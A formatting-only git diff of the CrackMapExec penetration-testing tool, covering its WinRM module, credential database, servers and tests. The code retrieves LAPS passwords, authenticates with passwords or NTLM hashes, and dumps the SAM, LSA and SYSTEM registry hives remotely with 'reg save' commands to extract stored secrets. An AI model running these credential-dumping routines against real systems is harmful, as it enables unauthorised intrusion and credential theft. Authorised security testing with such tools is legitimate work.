str(attr["vals"][0]) - for attr in host["attributes"] - } + values = {str(attr["type"]).lower(): str(attr["vals"][0]) for attr in host["attributes"]} if "mslaps-encryptedpassword" in values: - self.logger.fail( - "LAPS password is encrypted and currently CrackMapExec doesn't" - " support the decryption..." - ) + self.logger.fail("LAPS password is encrypted and currently CrackMapExec doesn't" " support the decryption...") return False elif "mslaps-password" in values: from json import loads @@ -276,30 +233,17 @@ class winrm(connection): elif "ms-mcs-admpwd" in values: msMCSAdmPwd = values["ms-mcs-admpwd"] else: - self.logger.fail( - "No result found with attribute ms-MCS-AdmPwd or" - " msLAPS-Password" - ) - self.logger.debug( - "Host: {:<20} Password: {} {}".format( - sAMAccountName, msMCSAdmPwd, self.hostname - ) - ) + self.logger.fail("No result found with attribute ms-MCS-AdmPwd or" " msLAPS-Password") + self.logger.debug("Host: {:<20} Password: {} {}".format(sAMAccountName, msMCSAdmPwd, self.hostname)) else: - self.logger.fail( - "msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS" - " property for {}".format(self.hostname) - ) + self.logger.fail("msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS" " property for {}".format(self.hostname)) return False self.username = self.args.laps if not username else username self.password = msMCSAdmPwd if msMCSAdmPwd == "": - self.logger.fail( - "msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS" - " property for {}".format(self.hostname) - ) + self.logger.fail("msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS" " property for {}".format(self.hostname)) return False if ntlm_hash: hash_ntlm = hashlib.new("md4", msMCSAdmPwd.encode("utf-16le")).digest() @@ -314,16 +258,12 @@ class winrm(connection): self.logger.display(self.endpoint) else: self.logger.extra["protocol"] = "SMB" - self.logger.display( - f"{self.server_os} (name:{self.hostname}) (domain:{self.domain})" - ) + self.logger.display(f"{self.server_os} (name:{self.hostname}) (domain:{self.domain})") self.logger.extra["protocol"] = "HTTP" self.logger.display(self.endpoint) if self.args.laps: - return self.laps_search( - self.args.username, self.args.password, self.args.hash, self.domain - ) + return self.laps_search(self.args.username, self.args.password, self.args.hash, self.domain) return True def create_conn_obj(self): @@ -336,27 +276,18 @@ class winrm(connection): try: self.logger.debug(f"winrm create_conn_obj() - Requesting URL: {url}") res = requests.post(url, verify=False, timeout=self.args.http_timeout) - self.logger.debug( - "winrm create_conn_obj() - Received response code:" - f" {res.status_code}" - ) + self.logger.debug("winrm create_conn_obj() - Received response code:" f" {res.status_code}") self.endpoint = url if self.endpoint.startswith("https://"): - self.logger.extra["port"] = ( - self.args.port if self.args.port else 5986 - ) + self.logger.extra["port"] = self.args.port if self.args.port else 5986 else: - self.logger.extra["port"] = ( - self.args.port if self.args.port else 5985 - ) + self.logger.extra["port"] = self.args.port if self.args.port else 5985 return True except requests.exceptions.Timeout as e: self.logger.info(f"Connection Timed out to WinRM service: {e}") except requests.exceptions.ConnectionError as e: if "Max retries exceeded with url" in str(e): - self.logger.info( - f"Connection Timeout to WinRM service (max retries exceeded)" - ) + self.logger.info(f"Connection Timeout to WinRM service (max retries exceeded)") else: self.logger.info(f"Other ConnectionError to WinRM service: {e}") return False @@ -400,13 +331,9 @@ class winrm(connection): # we could just authenticate without running a command :) (probably) self.conn.execute_ps("hostname") self.admin_privs = True - self.logger.success( - f"{self.domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}" - ) + self.logger.success(f"{self.domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}") - self.logger.debug( - f"Adding credential: {domain}/{self.username}:{self.password}" - ) + self.logger.debug(f"Adding credential: {domain}/{self.username}:{self.password}") self.db.add_credential("plaintext", domain, self.username, self.password) # TODO: when we can easily get the host_id via RETURNING statements, readd this in # host_id = self.db.get_hosts(self.host)[0].id @@ -414,9 +341,7 @@ class winrm(connection): if self.admin_privs: self.logger.debug(f"Inside admin privs") - self.db.add_admin_user( - "plaintext", domain, self.username, self.password, self.host - ) # , user_id=user_id) + self.db.add_admin_user("plaintext", domain, self.username, self.password, self.host) # , user_id=user_id) if not self.args.local_auth: add_user_bh(self.username, self.domain, self.logger, self.config) @@ -424,13 +349,9 @@ class winrm(connection): return True except Exception as e: if "with ntlm" in str(e): - self.logger.fail( - f"{self.domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}" - ) + self.logger.fail(f"{self.domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}") else: - self.logger.fail( - f"{self.domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()} '{e}'" - ) + self.logger.fail(f"{self.domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()} '{e}'") return False @@ -488,9 +409,7 @@ class winrm(connection): # we could just authenticate without running a command :) (probably) self.conn.execute_ps("hostname") self.admin_privs = True - self.logger.success( - f"{self.domain}\\{self.username}:{process_secret(nthash)} {self.mark_pwned()}" - ) + self.logger.success(f"{self.domain}\\{self.username}:{process_secret(nthash)} {self.mark_pwned()}") self.db.add_credential("hash", domain, self.username, nthash) if self.admin_privs: @@ -503,23 +422,16 @@ class winrm(connection): except Exception as e: if "with ntlm" in str(e): - self.logger.fail( - f"{self.domain}\\{self.username}:{process_secret(nthash)}" - ) + self.logger.fail(f"{self.domain}\\{self.username}:{process_secret(nthash)}") else: - self.logger.fail( - f"{self.domain}\\{self.username}:{process_secret(nthash)} '{e}'" - ) + self.logger.fail(f"{self.domain}\\{self.username}:{process_secret(nthash)} '{e}'") return False def execute(self, payload=None, get_output=False): try: r = self.conn.execute_cmd(self.args.execute) except: - self.logger.info( - "Cannot execute command, probably because user is not local admin, but" - " powershell command should be ok!" - ) + self.logger.info("Cannot execute command, probably because user is not local admin, but" " powershell command should be ok!") r = self.conn.execute_ps(self.args.execute) self.logger.success("Executed command") self.logger.highlight(r[0]) @@ -530,15 +442,10 @@ class winrm(connection): self.logger.highlight(r[0]) def sam(self): - self.conn.execute_cmd( - "reg save HKLM\SAM C:\\windows\\temp\\SAM && reg save HKLM\SYSTEM" - " C:\\windows\\temp\\SYSTEM" - ) + self.conn.execute_cmd("reg save HKLM\SAM C:\\windows\\temp\\SAM && reg save HKLM\SYSTEM" " C:\\windows\\temp\\SYSTEM") self.conn.fetch("C:\\windows\\temp\\SAM", self.output_filename + ".sam") self.conn.fetch("C:\\windows\\temp\\SYSTEM", self.output_filename + ".system") - self.conn.execute_cmd( - "del C:\\windows\\temp\\SAM && del C:\\windows\\temp\\SYSTEM" - ) + self.conn.execute_cmd("del C:\\windows\\temp\\SAM && del C:\\windows\\temp\\SYSTEM") local_operations = LocalOperations(f"{self.output_filename}.system") boot_key = local_operations.getBootKey() @@ -552,17 +459,10 @@ class winrm(connection): SAM.export(f"{self.output_filename}.sam") def lsa(self): - self.conn.execute_cmd( - "reg save HKLM\SECURITY C:\\windows\\temp\\SECURITY && reg save HKLM\SYSTEM" - " C:\\windows\\temp\\SYSTEM" - ) - self.conn.fetch( - "C:\\windows\\temp\\SECURITY", f"{self.output_filename}.security" - ) + self.conn.execute_cmd("reg save HKLM\SECURITY C:\\windows\\temp\\SECURITY && reg save HKLM\SYSTEM" " C:\\windows\\temp\\SYSTEM") + self.conn.fetch("C:\\windows\\temp\\SECURITY", f"{self.output_filename}.security") self.conn.fetch("C:\\windows\\temp\\SYSTEM", f"{self.output_filename}.system") - self.conn.execute_cmd( - "del C:\\windows\\temp\\SYSTEM && del C:\\windows\\temp\\SECURITY" - ) + self.conn.execute_cmd("del C:\\windows\\temp\\SYSTEM && del C:\\windows\\temp\\SECURITY") local_operations = LocalOperations(f"{self.output_filename}.system") boot_key = local_operations.getBootKey() diff --git a/cme/protocols/winrm/database.py b/cme/protocols/winrm/database.py index 672fb8d8..4921dd3a 100644 --- a/cme/protocols/winrm/database.py +++ b/cme/protocols/winrm/database.py @@ -73,25 +73,12 @@ class database: def reflect_tables(self): with self.db_engine.connect() as conn: try: - self.HostsTable = Table( - "hosts", self.metadata, autoload_with=self.db_engine - ) - self.UsersTable = Table( - "users", self.metadata, autoload_with=self.db_engine - ) - self.AdminRelationsTable = Table( - "admin_relations", self.metadata, autoload_with=self.db_engine - ) - self.LoggedinRelationsTable = Table( - "loggedin_relations", self.metadata, autoload_with=self.db_engine - ) + self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine) + self.UsersTable = Table("users", self.metadata, autoload_with=self.db_engine) + self.AdminRelationsTable = Table("admin_relations", self.metadata, autoload_with=self.db_engine) + self.LoggedinRelationsTable = Table("loggedin_relations", self.metadata, autoload_with=self.db_engine) except (NoInspectionAvailable, NoSuchTableError): - print( - "[-] Error reflecting tables - this means there is a DB schema mismatch \n" - "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" - "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" - "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema" - ) + print("[-] Error reflecting tables - this means there is a DB schema mismatch \n" "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema") exit() def shutdown_db(self): @@ -152,9 +139,7 @@ class database: # TODO: find a way to abstract this away to a single Upsert call q = Insert(self.HostsTable) update_columns = {col.name: col for col in q.excluded if col.name not in "id"} - q = q.on_conflict_do_update( - index_elements=self.HostsTable.primary_key, set_=update_columns - ) + q = q.on_conflict_do_update(index_elements=self.HostsTable.primary_key, set_=update_columns) self.conn.execute(q, hosts) def add_credential(self, credtype, domain, username, password, pillaged_from=None): @@ -215,12 +200,8 @@ class database: # TODO: find a way to abstract this away to a single Upsert call q_users = Insert(self.UsersTable) # .returning(self.UsersTable.c.id) - update_columns_users = { - col.name: col for col in q_users.excluded if col.name not in "id" - } - q_users = q_users.on_conflict_do_update( - index_elements=self.UsersTable.primary_key, set_=update_columns_users - ) + update_columns_users = {col.name: col for col in q_users.excluded if col.name not in "id"} + q_users = q_users.on_conflict_do_update(index_elements=self.UsersTable.primary_key, set_=update_columns_users) self.conn.execute(q_users, credentials) # .scalar() # return user_ids @@ -271,13 +252,9 @@ class database: def get_admin_relations(self, user_id=None, host_id=None): if user_id: - q = select(self.AdminRelationsTable).filter( - self.AdminRelationsTable.c.userid == user_id - ) + q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.userid == user_id) elif host_id: - q = select(self.AdminRelationsTable).filter( - self.AdminRelationsTable.c.hostid == host_id - ) + q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.hostid == host_id) else: q = select(self.AdminRelationsTable) @@ -317,9 +294,7 @@ class database: # if we're filtering by username elif filter_term and filter_term != "": like_term = func.lower(f"%{filter_term}%") - q = select(self.UsersTable).filter( - func.lower(self.UsersTable.c.username).like(like_term) - ) + q = select(self.UsersTable).filter(func.lower(self.UsersTable.c.username).like(like_term)) # otherwise return all credentials else: q = select(self.UsersTable) @@ -328,15 +303,11 @@ class database: return results def is_credential_local(self, credential_id): - q = select(self.UsersTable.c.domain).filter( - self.UsersTable.c.id == credential_id - ) + q = select(self.UsersTable.c.domain).filter(self.UsersTable.c.id == credential_id) user_domain = self.conn.execute(q).all() if user_domain: - q = select(self.HostsTable).filter( - func.lower(self.HostsTable.c.id) == func.lower(user_domain) - ) + q = select(self.HostsTable).filter(func.lower(self.HostsTable.c.id) == func.lower(user_domain)) results = self.conn.execute(q).all() return len(results) > 0 @@ -369,10 +340,7 @@ class database: # if we're filtering by ip/hostname elif filter_term and filter_term != "": like_term = func.lower(f"%{filter_term}%") - q = q.filter( - self.HostsTable.c.ip.like(like_term) - | func.lower(self.HostsTable.c.hostname).like(like_term) - ) + q = q.filter(self.HostsTable.c.ip.like(like_term) | func.lower(self.HostsTable.c.hostname).like(like_term)) results = self.conn.execute(q).all() cme_logger.debug(f"winrm get_hosts() - results: {results}") return results @@ -417,9 +385,7 @@ class database: relation = {"userid": user_id, "hostid": host_id} try: # TODO: find a way to abstract this away to a single Upsert call - q = Insert( - self.LoggedinRelationsTable - ) # .returning(self.LoggedinRelationsTable.c.id) + q = Insert(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id) self.conn.execute(q, [relation]) # .scalar() # return inserted_ids @@ -427,9 +393,7 @@ class database: cme_logger.debug(f"Error inserting LoggedinRelation: {e}") def get_loggedin_relations(self, user_id=None, host_id=None): - q = select( - self.LoggedinRelationsTable - ) # .returning(self.LoggedinRelationsTable.c.id) + q = select(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id) if user_id: q = q.filter(self.LoggedinRelationsTable.c.userid == user_id) if host_id: diff --git a/cme/protocols/winrm/db_navigator.py b/cme/protocols/winrm/db_navigator.py index 0d99754f..bf6ec589 100644 --- a/cme/protocols/winrm/db_navigator.py +++ b/cme/protocols/winrm/db_navigator.py @@ -182,9 +182,7 @@ class navigator(DatabaseNavigator): credtype = cred[4] pillaged_from = cred[5] - data.append( - [cred_id, credtype, pillaged_from, domain, username, password] - ) + data.append([cred_id, credtype, pillaged_from, domain, username, password]) print_table(data, title="Credential(s)") data = [["HostID", "IP", "Hostname", "Domain", "OS"]] @@ -226,12 +224,7 @@ class navigator(DatabaseNavigator): print_help(help_string) def do_clear_database(self, line): - if ( - input( - "This will destroy all data in the current database, are you SURE you want to run this? (y/n): " - ) - == "y" - ): + if input("This will destroy all data in the current database, are you SURE you want to run this? (y/n): ") == "y": self.db.clear_database() def help_clear_database(self): diff --git a/cme/servers/http.py b/cme/servers/http.py index d7a17119..6d262b45 100755 --- a/cme/servers/http.py +++ b/cme/servers/http.py @@ -51,9 +51,7 @@ class RequestHandler(BaseHTTPRequestHandler): try: self.server.hosts.remove(self.client_address[0]) if hasattr(self.server.module, "on_shutdown"): - self.server.module.on_shutdown( - self.server.context, self.server.connection - ) + self.server.module.on_shutdown(self.server.context, self.server.connection) except ValueError: pass @@ -67,24 +65,18 @@ class CMEServer(threading.Thread): self.server.hosts = [] self.server.module = module self.server.context = context - self.server.log = CMEAdapter( - extra={"module_name": self.server.module.name.upper()} - ) + self.server.log = CMEAdapter(extra={"module_name": self.server.module.name.upper()}) self.cert_path = os.path.join(os.path.expanduser("~/.cme"), "cme.pem") self.server.track_host = self.track_host logger.debug("CME server type: " + server_type) if server_type == "https": - self.server.socket = ssl.wrap_socket( - self.server.socket, certfile=self.cert_path, server_side=True - ) + self.server.socket = ssl.wrap_socket(self.server.socket, certfile=self.cert_path, server_side=True) except Exception as e: errno, message = e.args if errno == 98 and message == "Address already in use": - logger.error( - "Error starting HTTP(S) server: the port is already in use, try specifying a diffrent port using --server-port" - ) + logger.error("Error starting HTTP(S) server: the port is already in use, try specifying a diffrent port using --server-port") else: logger.error(f"Error starting HTTP(S) server: {message}") @@ -105,9 +97,7 @@ class CMEServer(threading.Thread): def shutdown(self): try: while len(self.server.hosts) > 0: - self.server.log.info( - f"Waiting on {highlight(len(self.server.hosts))} host(s)" - ) + self.server.log.info(f"Waiting on {highlight(len(self.server.hosts))} host(s)") sleep(15) except KeyboardInterrupt: pass diff --git a/cme/servers/smb.py b/cme/servers/smb.py index 2befa078..b89333a5 100755 --- a/cme/servers/smb.py +++ b/cme/servers/smb.py @@ -28,9 +28,7 @@ class CMESMBServer(threading.Thread): except Exception as e: errno, message = e.args if errno == 98 and message == "Address already in use": - logger.error( - "Error starting SMB server on port 445: the port is already in use" - ) + logger.error("Error starting SMB server on port 445: the port is already in use") else: logger.error(f"Error starting SMB server on port 445: {message}") exit(1) diff --git a/tests/e2e_test.py b/tests/e2e_test.py index b94db955..f449e529 100644 --- a/tests/e2e_test.py +++ b/tests/e2e_test.py @@ -5,9 +5,7 @@ from rich.console import Console def get_cli_args(): - parser = argparse.ArgumentParser( - description=f"Script for running end to end tests for CME" - ) + parser = argparse.ArgumentParser(description=f"Script for running end to end tests for CME") parser.add_argument("-t", "--target", dest="target", required=True) parser.add_argument("-u", "--user", "--username", dest="username", required=True) parser.add_argument("-p", "--pass", "--password", dest="password", required=True) @@ -53,12 +51,7 @@ def generate_commands(args): if line.startswith("#"): continue line = line.strip() - line = ( - line.replace("TARGET_HOST", args.target) - .replace("USERNAME", f'"{args.username}"') - .replace("PASSWORD", f'"{args.password}"') - .replace("KERBEROS ", kerberos) - ) + line = line.replace("TARGET_HOST", args.target).replace("USERNAME", f'"{args.username}"').replace("PASSWORD", f'"{args.password}"').replace("KERBEROS ", kerberos) lines.append(line) return lines @@ -75,9 +68,7 @@ def run_e2e_tests(args): ) version = result.communicate()[0].decode().strip() - with console.status( - f"[bold green] :brain: Running {len(tasks)} test commands for cme v{version}..." - ) as status: + with console.status(f"[bold green] :brain: Running {len(tasks)} test commands for cme v{version}...") as status: passed = 0 failed = 0 diff --git a/tests/test_smb_database.py b/tests/test_smb_database.py index cb592426..2fcb5025 100644 --- a/tests/test_smb_database.py +++ b/tests/test_smb_database.py @@ -17,9 +17,7 @@ from sqlalchemy.dialects.sqlite import Insert @pytest.fixture(scope="session") def db_engine(): db_path = os.path.join(WS_PATH, "test/smb.db") - db_engine = create_engine( - f"sqlite:///{db_path}", isolation_level="AUTOCOMMIT", future=True - ) + db_engine = create_engine(f"sqlite:///{db_path}", isolation_level="AUTOCOMMIT", future=True) yield db_engine db_engine.dispose()